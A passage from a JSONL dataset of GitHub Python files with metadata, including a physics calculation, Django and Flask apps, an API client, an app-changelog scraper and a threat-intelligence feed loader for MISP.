Hy0[index] = cosphi[index] * jv(1, U * value / r) / jv(1, U)\n elif value > r:\n Hx0[index] = -sinphi[index] * kv(1, W * value / r) / kv(1, W)\n Hy0[index] = cosphi[index] * kv(1, W * value / r) / kv(1, W)\n\nhxmax = np.amax(abs(Hx0))\nhymax = np.amax(abs(Hy0))\nHx0 = Hx0 / max(hxmax, hymax)\nHy0 = Hy0 / max(hxmax, hymax)\n\nx = x.flatten()\ny = y.flatten()\n", "repo_name": "alikaikai/myfdm", "sub_path": "examples/fiber_tm_exact.py", "file_name": "fiber_tm_exact.py", "file_ext": "py", "file_size_in_byte": 1562, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "fiber.fiber", "line_number": 17, "usage_type": "call"}, {"api_name": "stretchmesh.stretchmesh", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 20, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 20, "usage_type": "call"}, {"api_name": "scipy.special.jv", "line_number": 24, "usage_type": "call"}, {"api_name": "scipy.special.kv", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 26, "usage_type": "call"}, {"api_name": "scipy.special.kv", "line_number": 26, "usage_type": "call"}, {"api_name": "scipy.optimize.fsolve", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 32, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.divide", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.divide", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.ndenumerate", "line_number": 45, "usage_type": "call"}, {"api_name": "scipy.special.jv", "line_number": 50, "usage_type": "call"}, {"api_name": "scipy.special.jv", "line_number": 51, "usage_type": "call"}, {"api_name": "scipy.special.kv", "line_number": 53, "usage_type": "call"}, {"api_name": "scipy.special.kv", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 57, "usage_type": "call"}]}
+{"seq_id": "554706284", "text": "from setuptools import setup, find_packages\nimport os\n\nversion = '1.6.5.dev0'\n\ntests_require = [\n 'ftw.testbrowser',\n 'ftw.testing',\n 'plone.app.testing',\n]\n\nsetup(\n name='ftw.colorbox',\n version=version,\n description=\"An image gallery for Plone using ColorBox\",\n long_description='{0}\\n{1}'.format(\n open(\"README.rst\").read(),\n open(os.path.join(\"docs\", \"HISTORY.txt\")).read()\n ),\n\n classifiers=[\n 'Framework :: Plone',\n 'Framework :: Plone :: 4.3',\n 'Framework :: Plone :: 5.1',\n 'Programming Language :: Python',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n ],\n\n keywords='ftw colorbox',\n author='4teamwork AG',\n author_email='mailto:info@4teamwork.ch',\n url='https://github.com/4teamwork/ftw.colorbox',\n license='GPL2',\n\n packages=find_packages(exclude=['ez_setup']),\n namespace_packages=['ftw'],\n include_package_data=True,\n zip_safe=False,\n\n install_requires=[\n 'ftw.upgrade',\n 'setuptools',\n 'Plone',\n 'plone.api',\n ],\n\n tests_require=tests_require,\n extras_require=dict(tests=tests_require),\n\n entry_points=\"\"\"\n # -*- Entry points: -*-\n [z3c.autoinclude.plugin]\n target = plone\n \"\"\",\n)\n", "repo_name": "4teamwork/ftw.colorbox", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1276, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "setuptools.setup", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "setuptools.find_packages", "line_number": 35, "usage_type": "call"}]}
+{"seq_id": "10251211992", "text": "from multiprocessing import Process\n\nimport os\nimport time\n\n\ndef info(title):\n print(title)\n print('module name:', __name__)\n if hasattr(os, 'getppid'):\n print('parent process: {}'.format(os.getppid()))\n print('process id: {}'.format(os.getpid()))\n\n\ndef f(name):\n info('function f')\n time.sleep(2)\n print('hello {}'.format(name))\n\n\nif __name__ == '__main__':\n info('main line')\n p = Process(target=f, args=('bob',))\n p.start()\n p.join()\n", "repo_name": "perrydzhu/pydem0", "sub_path": "sock/multiproc.py", "file_name": "multiproc.py", "file_ext": "py", "file_size_in_byte": 477, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.getppid", "line_number": 11, "usage_type": "call"}, {"api_name": "os.getpid", "line_number": 12, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 17, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 23, "usage_type": "call"}]}
+{"seq_id": "15886466092", "text": "\"\"\"from turtle import Turtle, Screen\ntimmy = Turtle()\nprint(timmy)\ntimmy.shape(\"turtle\")\ntimmy.fd(100)\ntimmy.color(\"red\")\n\nmy_screen = Screen()\nprint(my_screen.canvheight)\n\nmy_screen.exitonclick()\"\"\"\n\nimport prettytable\n\nfrom prettytable import PrettyTable\ntable = PrettyTable()\nprint(table)\n#table.add_row([\"Name\",1,2])\ntable.add_column(\"age\",[11,22])\ntable.add_column(\"Name\",[11,22])\ntable.align =\"r\"\nprint(table)", "repo_name": "Harini0924/day-16-start", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 416, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "prettytable.PrettyTable", "line_number": 16, "usage_type": "call"}]}
+{"seq_id": "281305449", "text": "import os\nimport yaml\nimport numpy as np\nimport random\n\nCONFIG_PATH = 'config/'\n\ndef smooth_curve(x): #사용 x\n window_len = 101\n s = np.r_[x[window_len-1:0:-1], x, x[-1:-window_len:-1]]\n w = np.kaiser(window_len, 2)\n y = np.convolve(w/w.sum(), s, mode='valid')\n return y[50:len(y)-50]\n\n\ndef shuffle_dataset(x, t): #사용 보류\n shuffled = list(zip(x, t))\n random.shuffle(shuffled)\n x = [e[0] for e in shuffled]\n t = [e[0] for e in shuffled]\n\n return x, t\n\ndef load_config(config_name):\n with open(os.path.join(CONFIG_PATH, config_name)) as file:\n config = yaml.safe_load(file)\n return config", "repo_name": "GwakJiho/DeepLearning", "sub_path": "cifar10/utils/util.py", "file_name": "util.py", "file_ext": "py", "file_size_in_byte": 640, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.r_", "line_number": 10, "usage_type": "attribute"}, {"api_name": "numpy.kaiser", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.convolve", "line_number": 12, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "yaml.safe_load", "line_number": 26, "usage_type": "call"}]}
+{"seq_id": "74813081766", "text": "from django import forms\n\nfrom account.models import Student\nfrom .models import *\n\n\nclass JudgmentFactsForm(forms.ModelForm):\n\n class Meta:\n model = JudgmentFacts\n fields = ['name', 'team_length', 'fact_max_time', 'status']\n\n\nclass FactForm(forms.ModelForm):\n\n CORRECT_ANSWER = Choices(\n (True, 'Verdadeiro'),\n (False, 'Falso'),\n )\n correct_answer = forms.ChoiceField(choices=CORRECT_ANSWER, widget=forms.RadioSelect())\n\n class Meta:\n model = Fact\n fields = ['order', 'statement', 'topic_group', 'correct_answer']\n\n def save(self, commit=True, **kwargs):\n jf = JudgmentFacts.objects.get(id=kwargs['jf_id'])\n data = self.data\n return Fact.objects.create(\n order=data['order'], statement=data['statement'], topic_group=data['topic_group'],\n correct_answer=data['correct_answer'], judgment_facts=jf\n )\n\n\nclass TeamForm(forms.ModelForm):\n\n def __init__(self, *args, **kwargs):\n super(TeamForm, self).__init__(*args, **kwargs)\n self.fields['member'].queryset = Student.objects.all().exclude(pk__in=Team.objects.all()).order_by('user__name')\n\n class Meta:\n model = Team\n fields = ['name', 'member']\n", "repo_name": "CarolClara/Julgamento-de-Fatos", "sub_path": "judgment_facts/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 1238, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.forms.ModelForm", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 7, "usage_type": "name"}, {"api_name": "django.forms.ModelForm", "line_number": 14, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 14, "usage_type": "name"}, {"api_name": "django.forms.ChoiceField", "line_number": 20, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 20, "usage_type": "name"}, {"api_name": "django.forms.RadioSelect", "line_number": 20, "usage_type": "call"}, {"api_name": "django.forms.ModelForm", "line_number": 35, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 35, "usage_type": "name"}, {"api_name": "account.models.Student.objects.all", "line_number": 39, "usage_type": "call"}, {"api_name": "account.models.Student.objects", "line_number": 39, "usage_type": "attribute"}, {"api_name": "account.models.Student", "line_number": 39, "usage_type": "name"}]}
+{"seq_id": "12126962479", "text": "import requests\nimport json\n\nlatitude = 0.0\nlongitude = 0.0\n\ndef get_Position():\n global latitude,longitude\n api_endpoint2 =\"http://api.open-notify.org/iss-now.json\"\n\n response = requests.get(api_endpoint2)\n print(response.status_code)\n status =response.raise_for_status()\n print(status)\n ctype =response.headers['content-type']\n print(ctype)\n\n if response.status_code == 200 :\n print(\"success\")\n data = response.json()\n print(json.dumps(data, indent=4))\n position = data[\"iss_position\"]\n latitude = data[\"iss_position\"][\"latitude\"]\n longitude = data[\"iss_position\"][\"longitude\"]\n pos = (position,latitude,longitude)\n print(pos)\n else :\n print(\"something went wrong!\")\n \n\ndef get_SunriseSunset(lat ,long):\n api_endpoint2 =\"https://api.sunrise-sunset.org/json\"\n payload ={\n \"lat\" : lat ,\n \"lng\" : long\n }\n response = requests.get(api_endpoint2,params=payload)\n\n print(response.status_code)\n status =response.raise_for_status()\n ctype =response.headers['content-type']\n print(ctype)\n\n if response.status_code == 200 :\n data = response.json()\n print(json.dumps(data, indent=4))\n print(data)\n sunrise = data[\"results\"][\"sunrise\"]\n sunset = data[\"results\"][\"sunset\"]\n print(\"sunrise time is : \" ,sunrise )\n print(\"sunset time is : \" ,sunset )\n else :\n print(\"something went wrong!\")\n\n\nget_Position()\nget_SunriseSunset(latitude,longitude)", "repo_name": "yogeshdhameliya6013/python", "sub_path": "api/sunrisesunset.py", "file_name": "sunrisesunset.py", "file_ext": "py", "file_size_in_byte": 1528, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 11, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 21, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 37, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 46, "usage_type": "call"}]}
+{"seq_id": "42724496558", "text": "from django.contrib import admin\nfrom django.contrib.auth import login, logout\nfrom django.urls import include, path\n\n\nadmin.autodiscover()\n\nurlpatterns = (\n path(\"admin/\", admin.site.urls),\n path(\n \"registration/login/\",\n login,\n name=\"login\",\n ),\n path(\n \"registration/logout/\",\n logout,\n name=\"logout\",\n ),\n path(\"\", include(\"blog.urls\")),\n)\n", "repo_name": "lambdalisue/django-author", "sub_path": "tests/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 405, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 36, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.contrib.admin.autodiscover", "line_number": 6, "usage_type": "call"}, {"api_name": "django.contrib.admin", "line_number": 6, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 9, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 9, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 12, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "django.contrib.auth.logout", "line_number": 17, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 20, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 20, "usage_type": "call"}]}
+{"seq_id": "38512938406", "text": "#! /usr/bin/env python\n# -*- coding: utf-8 -*-\nimport os\nimport datetime\nimport urllib.request\nimport urllib.error\nimport urllib.parse\nimport csv\nimport json\nimport codecs\nimport lxml\nfrom lxml import html\nimport yaml\n\n\ndef convert_to_datetime_date(date):\n \"\"\"Convert date to datetime.date\n\n Params:\n date (logring): \"Nov 15 '16\"\n Return:\n (datetime.date): datetime.date(2016,11,15)\n\n >>> convert_to_datetime_date(\"Nov 15 '16\")\n datetime.date(2016, 11, 15)\n \"\"\"\n date = date.split()\n month_name = ['January', 'February', 'March', 'April', 'May', 'June',\n 'July', 'Augulog', 'September', 'October', 'November', 'December']\n month_name = [x[:3] for x in month_name]\n month = month_name.index(date[0]) + 1\n date[2] = date[2].replace(\"'\", '20')\n return datetime.date(year=int(date[2]), month=month, day=int(date[1]))\n\n\ndef start_request(url):\n request = urllib.request.urlopen(url)\n # process handle exception\n response = request.read()\n return response\n\n\ndef log_data(app, version, date, change_log, database):\n if os.path.exists(database):\n mode = 'a'\n else:\n mode = 'w'\n if change_log == '':\n change_log = 'Rand'\n fields = ['iOS', date, '1', app, '1', '1',\n 'Version', 'Rand', version, change_log]\n fields_name = ['Platform', 'Date', 'App ID', 'App Name', 'Publisher ID',\n 'Publisher Name', 'Update Type', 'Previous Value', 'New Value', 'Notes']\n\n stream = open(database, mode)\n writer = csv.writer(stream)\n if mode == 'w':\n writer.writerow(fields_name)\n writer.writerow(fields)\n\n\ndef format_change_log(log):\n \"\"\"Reformat application news log to desired form.\n\n \"\"\"\n # print(log)\n detele_char = [\"u'\", 'u\"', \"'\", '\"', \"\",\n \" \", \"
\", '-', '[', ']', \"\"]\n for char in detele_char:\n log = log.replace(char, \"\")\n\n f = codecs.open(\"temp.txt\", \"w\", \"utf-8\")\n f.write(log)\n f.close()\n\n f = open(\"temp.txt\", \"r\")\n log = \"\"\n for line in f:\n log = log + line\n\n f.close()\n\n #log = log.replace(\"\\n\", \" \")\n unicode_logr = {\n \"\\xc2\\xb7\": \"\\n-\",\n \"\\xe2\\x80\\xa2\": \"\\n-\",\n \"\\xe2\\x80\\x94\": \"\\n-\",\n '\\xc3\\xa2\\xc2\\x80\\xc2\\xa2': \"-\",\n '\\xc3\\xb0\\xc2\\x9f\\xc2\\x91\\xc2\\xbb': '',\n '\\xc3\\x82\\xc2\\xa0': ' ',\n '\\xc3\\xa2\\xc2\\x80\\xc2\\x94': ' '\n }\n\n # print log\n\n for key in list(unicode_logr.keys()):\n log = log.replace(key, unicode_logr[key])\n\n return log\n\n\ndef process_response(resp, start_date, database):\n \"\"\"\n Get all the app update activity from start_date.\n \"\"\"\n\n tree = lxml.html.fromstring(resp)\n app_name = tree.xpath(\n '//*[@id=\"bsap_1291153\"]/div[2]/div/div[1]/div[1]/div/h1/text()')[0]\n change_log = \"\"\n for st in tree.xpath('//*[@id=\"bsap_1291153\"]/div[2]/div/div[1]/div[2]/p[2]/text()'):\n change_log = change_log + st\n change_log = format_change_log(change_log)\n\n version_set = tree.xpath(\n '//*[@id=\"bsap_1291153\"]/div[2]/div/div[2]/div[2]/div/ul/li')\n for element in version_set:\n version = element.xpath('b/text()')[0]\n version = version.split()[1]\n date = element.xpath(\"span/text()\")[0]\n date = convert_to_datetime_date(date)\n if date >= start_date:\n log_data(app_name, version, date, change_log, database)\n\n # reset changelog\n change_log = \"\"\n\n\ndef get_params(index_file):\n \"\"\"\n Params:\n index_file (string): index file name.\n\n Returns:\n (dictionary): parameters and values.\n\n >>> params = get_params(\"index.yaml\")\n >>> params['country']\n 'VN'\n >>> params['list_name']\n 'topselling_free'\n >>> params['cat_key']\n 'APPLICATION'\n \"\"\"\n stream = open(index_file, \"r\")\n params = yaml.load(stream)\n stream.close()\n\n return params\n\n\ndef scan_for_change(index_file):\n\n params = get_params(index_file)['change_logs']\n\n database = params['database_name']\n\n today = datetime.date.today()\n\n start_date = today - datetime.timedelta(params['range_of_query'])\n\n for app_info in list(params['apps_src_dest'].keys()):\n print(\"Running: \" + app_info + \"\\n\")\n url = params['apps_src_dest'][app_info][0]\n database = params['dir'] + params['apps_src_dest'][app_info][1]\n resp = start_request(url)\n process_response(resp, start_date, database)\n\n\nprint(\"Program {} start!\".format(__file__))\nscan_for_change('index_ios.yaml')\nprint(\"Program {} finish sucessfully.\".format(__file__))\n\n# if __name__ == \"__main__\":\n# import doctest\n# doctest.testmod()\n", "repo_name": "zenzjtech/Mobile-app-timeline", "sub_path": "change-logs_ios.py", "file_name": "change-logs_ios.py", "file_ext": "py", "file_size_in_byte": 4662, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datetime.date", "line_number": 33, "usage_type": "call"}, {"api_name": "urllib.request.request.urlopen", "line_number": 37, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 37, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 37, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path", "line_number": 44, "usage_type": "attribute"}, {"api_name": "csv.writer", "line_number": 56, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 72, "usage_type": "call"}, {"api_name": "lxml.html.fromstring", "line_number": 107, "usage_type": "call"}, {"api_name": "lxml.html", "line_number": 107, "usage_type": "attribute"}, {"api_name": "yaml.load", "line_number": 146, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 158, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 158, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 160, "usage_type": "call"}]}
+{"seq_id": "23840309202", "text": "import requests\nfrom requests import HTTPError, ConnectionError, ConnectTimeout\nfrom model import Config\nfrom model.events import C2Server, Malware, Actor, Family\nfrom datetime import datetime, timedelta\nimport logging\nimport sys\n\n\nclass Loader:\n\n @staticmethod\n def start(conf, tags, type, startdate, file, noupload, searchfile, proxy_misp_addr, proxy_tie_addr):\n\n # Building Auth Header\n conf_authHeader = {'Authorization': 'Bearer ' + conf.tie_api_key}\n\n # Building URL\n date_since = startdate.strftime(\"%Y-%m-%d\")\n dt = startdate + timedelta(days=1)\n date_until = dt.strftime(\"%Y-%m-%d\")\n category = None\n finished = True\n event = None\n connection_error = False\n\n # Eventtype\n if type == 'c2server':\n event = C2Server(conf.org_name, conf.org_uuid, conf.event_base_thread_level, conf.event_published,\n conf.event_info_c2server, startdate)\n category = 'c2-server'\n elif type == 'malware':\n event = Malware(conf.org_name, conf.org_uuid, conf.event_base_thread_level, conf.event_published,\n conf.event_info_malware, startdate)\n category = 'malware'\n\n elif type == 'actor':\n event = Actor(conf.org_name, conf.org_uuid, conf.event_base_thread_level, conf.event_published,\n conf.event_info_actor, startdate)\n category = 'actor'\n\n elif type == 'family':\n event = Family(conf.org_name, conf.org_uuid, conf.event_base_thread_level, conf.event_published,\n conf.event_info_family, startdate)\n category = 'family'\n\n # Buildung parameters\n payload = dict()\n if category == 'c2-server' or category == 'malware':\n payload['category'] = category\n payload['created_since'] = date_since\n payload['created_until'] = date_until\n\n else:\n attr_list = ''\n count = 0\n for l in searchfile:\n if count is 0:\n attr_list += l\n else:\n attr_list += ',' + l\n count += 1\n attr_list = attr_list.replace('\\n', '')\n if category is 'actor':\n payload['actor'] = attr_list\n else:\n payload['family'] = attr_list\n\n url = conf.tie_api_url + conf.url_iocs\n index = 0\n connection_retrys = 1\n while finished:\n try:\n myResponse = requests.get(url, params=payload, headers=conf_authHeader, proxies=proxy_tie_addr)\n # For successful API call, response code will be 200 (OK)\n if myResponse.ok:\n # print(myResponse.status_code)\n # Loading the response data into a dict variable\n # json.loads takes in only binary or string variables so using content to fetch binary content\n # Loads (Load String) takes a Json file and converts into python data structure\n # (dict or list, depending on JSON)\n\n try:\n jsonResponse = myResponse.json()\n\n # check is TIE Response is complete\n response_has_more = None\n response_iocs = None\n response_params = None\n if 'has_more' in jsonResponse and 'iocs' in jsonResponse and 'params' in jsonResponse:\n response_has_more = jsonResponse['has_more']\n response_iocs = jsonResponse['iocs']\n response_params = jsonResponse['params']\n else:\n raise ValueError(\"Error: TIE answered with an invalid or empty JSON Response\")\n\n # parsing received IOC's\n logging.info(\"Parsing... - Offset: \" + str(index) + \" to \" + str(index + len(response_iocs)))\n index += len(response_iocs)\n\n if type == 'c2server':\n C2Server.parse(event, response_iocs, tags)\n elif type == 'malware':\n Malware.parse(event, response_iocs, tags)\n elif type == 'actor':\n Actor.parse(event, response_iocs, tags)\n elif type == 'family':\n Family.parse(event, response_iocs, tags)\n\n if response_has_more is not True:\n finished = False\n logging.info(\"There are no more attributes\")\n logging.info(\"#### Finished #####\")\n break\n else:\n if isinstance(myResponse.links, dict):\n res = myResponse.links[\"next\"]\n url = res[\"url\"]\n logging.info(\"#### Continue #####\")\n\n except ValueError:\n logging.error(\"Error: Invalid or empty JSON Response\")\n elif myResponse.status_code >= 500 and myResponse.status_code <= 550:\n logging.warning(\"It seems there are connection issues with TIE at the moment\")\n logging.warning(\"Status-Code: \" + str(myResponse.status_code) + \" - Try: \" + connection_retrys + \" from 5\")\n\n connection_retrys += 1\n if connection_retrys < 6:\n continue\n else:\n logging.error(\"TIE seems not to be available at the moment or connection is interrupted\")\n raise ConnectionError\n\n else:\n # If response code is not ok (200), print the resulting http error code with description\n logging.error(\"Error:\")\n logging.error(myResponse.content)\n myResponse.raise_for_status()\n except (HTTPError, ConnectionError, ConnectTimeout) as e:\n logging.error(\"Error:\")\n logging.error(\"TIE seems not to be available at the moment or connection is interrupted\")\n connection_error = True\n finished = False\n\n # TIE is available?\n if not noupload and not connection_error and conf.misp_api_key is not None and conf.misp_api_url is not None:\n # Add Base Tags\n if isinstance(event, C2Server):\n if tags.c2tags_base is not None:\n for val in tags.c2tags_base:\n event.append_tags(tags.c2tags_base[val])\n elif isinstance(event, Malware):\n if tags.malwaretags_base is not None:\n for val in tags.c2tags_base:\n event.append_tags(tags.c2tags_base[val])\n\n # Load things up\n try:\n event.upload(conf, proxy_misp_addr)\n except Exception as e:\n logging.error(\"Error uploading event to MISP. Something went wrong...\\n\")\n\n else:\n if not noupload and not connection_error:\n logging.warning(\"Can not upload event. MISP API key or MISP API URL is missing\")\n\n if file:\n # Serialize event as MISP Event\n json_output = event.serialize()\n outfile = type + \"_\" + str(event.uuid) + \".json\"\n logging.info(\"Saved attributes as JSON-File: \" + outfile)\n with open(outfile, \"w\") as text_file:\n text_file.write(json_output)\n\n @staticmethod\n def init_logger(logPath, fileName, logLvl, consoleLog, fileLog):\n\n logger = logging.getLogger()\n logger.setLevel(logLvl)\n formatter = logging.Formatter('%(asctime)s [%(levelname)-5.5s] %(message)s')\n\n consoleHandler = logging.StreamHandler(sys.stdout)\n\n consoleHandler.setFormatter(formatter)\n logger.addHandler(consoleHandler)\n\n if consoleLog is False:\n consoleHandler.setLevel(logLvl)\n else:\n consoleHandler.setLevel(100)\n\n if fileLog is False:\n fileHandler = logging.FileHandler(\"{0}/{1}.log\".format(logPath, fileName))\n fileHandler.setFormatter(formatter)\n fileHandler.setLevel(logLvl)\n logger.addHandler(fileHandler)\n\n", "repo_name": "DCSO/tie2misp", "sub_path": "loader.py", "file_name": "loader.py", "file_ext": "py", "file_size_in_byte": 8553, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datetime.timedelta", "line_number": 20, "usage_type": "call"}, {"api_name": "model.events.C2Server", "line_number": 29, "usage_type": "call"}, {"api_name": "model.events.Malware", "line_number": 33, "usage_type": "call"}, {"api_name": "model.events.Actor", "line_number": 38, "usage_type": "call"}, {"api_name": "model.events.Family", "line_number": 43, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 74, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 98, "usage_type": "call"}, {"api_name": "model.events.C2Server.parse", "line_number": 102, "usage_type": "call"}, {"api_name": "model.events.C2Server", "line_number": 102, "usage_type": "name"}, {"api_name": "model.events.Malware.parse", "line_number": 104, "usage_type": "call"}, {"api_name": "model.events.Malware", "line_number": 104, "usage_type": "name"}, {"api_name": "model.events.Actor.parse", "line_number": 106, "usage_type": "call"}, {"api_name": "model.events.Actor", "line_number": 106, "usage_type": "name"}, {"api_name": "model.events.Family.parse", "line_number": 108, "usage_type": "call"}, {"api_name": "model.events.Family", "line_number": 108, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 112, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 113, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 119, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 122, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 124, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 125, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 131, "usage_type": "call"}, {"api_name": "requests.ConnectionError", "line_number": 132, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 136, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 137, "usage_type": "call"}, {"api_name": "requests.HTTPError", "line_number": 139, "usage_type": "name"}, {"api_name": "requests.ConnectionError", "line_number": 139, "usage_type": "name"}, {"api_name": "requests.ConnectTimeout", "line_number": 139, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 140, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 141, "usage_type": "call"}, {"api_name": "model.events.C2Server", "line_number": 148, "usage_type": "argument"}, {"api_name": "model.events.Malware", "line_number": 152, "usage_type": "argument"}, {"api_name": "logging.error", "line_number": 161, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 165, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 171, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 178, "usage_type": "call"}, {"api_name": "logging.Formatter", "line_number": 180, "usage_type": "call"}, {"api_name": "logging.StreamHandler", "line_number": 182, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 182, "usage_type": "attribute"}, {"api_name": "logging.FileHandler", "line_number": 193, "usage_type": "call"}]}
+{"seq_id": "74741752489", "text": "import os\nfrom flask import Flask, jsonify, request, send_from_directory, render_template\nfrom models_wrapper import CodeSnippet\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nimport sys\nfrom flask_cors import CORS\nfrom sqlalchemy import or_\n\n# Initialize Flask app\napp = Flask(__name__)\n\n# Add CORS middleware to allow cross-origin requests\ncors = CORS(app)\n\n# Database configurations\nDB_NAME = \"mydatabase\"\nDB_USER = \"your_new_user\"\nDB_PASSWORD = \"qwerty\"\nDB_HOST = \"localhost\"\nDB_PORT = \"5432\"\n\n# Create a database engine and a session factory\nengine = create_engine(f\"postgresql://{DB_USER}:{DB_PASSWORD}@{DB_HOST}:{DB_PORT}/{DB_NAME}\")\nSession = sessionmaker(bind=engine)\n\n# API endpoint to add a new code snippet\n@app.route('/add_snippet', methods=['POST'])\ndef add_snippet():\n # Get the data from the request\n snippet_data = request.json\n\n # Create a session and add a new code snippet to the database\n session = Session()\n new_snippet = CodeSnippet(\n name=snippet_data['name'],\n description=snippet_data['description'],\n file_path=snippet_data['file_path'],\n code=snippet_data['code']\n )\n session.add(new_snippet)\n session.commit()\n\n # Return a success message\n return jsonify({'message': 'Code snippet added successfully.'})\n\n# API endpoint to search code snippets\n@app.route('/search', methods=['POST'])\ndef search_code_snippets():\n # Get search criteria from the request\n search_data = request.json\n\n # Create a session and query the database\n session = Session()\n query = session.query(CodeSnippet)\n\n # Apply search filters\n query = query.filter(\n or_(\n CodeSnippet.name.contains(search_data['name']),\n CodeSnippet.description.contains(search_data['description']),\n CodeSnippet.code.contains(search_data['code'])\n )\n )\n\n # Fetch results and convert them to a list of dictionaries\n results = query.all()\n response_data = [{'id': result.id, 'name': result.name, 'description': result.description, 'file_path': result.file_path, 'code': result.code, 'latest_commit': result.latest_commit} for result in results]\n\n # Debugging\n print('Search data:', search_data)\n print('Query:', query)\n print('Results:', results)\n print('Response data:', response_data)\n\n # Print executed SQL\n print(\"Executed SQL:\", query.statement.compile(compile_kwargs={\"literal_binds\": True}))\n\n # Return JSON response\n return jsonify(response_data)\n\n@app.route('/generate', methods=['POST'])\ndef generate():\n data = request.get_json()\n input_text = data.get('input')\n code_snippet = CodeSnippet(input_text)\n code = code_snippet.generate_code()\n return jsonify({\"code\": code})\n\n@app.route('/index1.html')\ndef index1():\n return 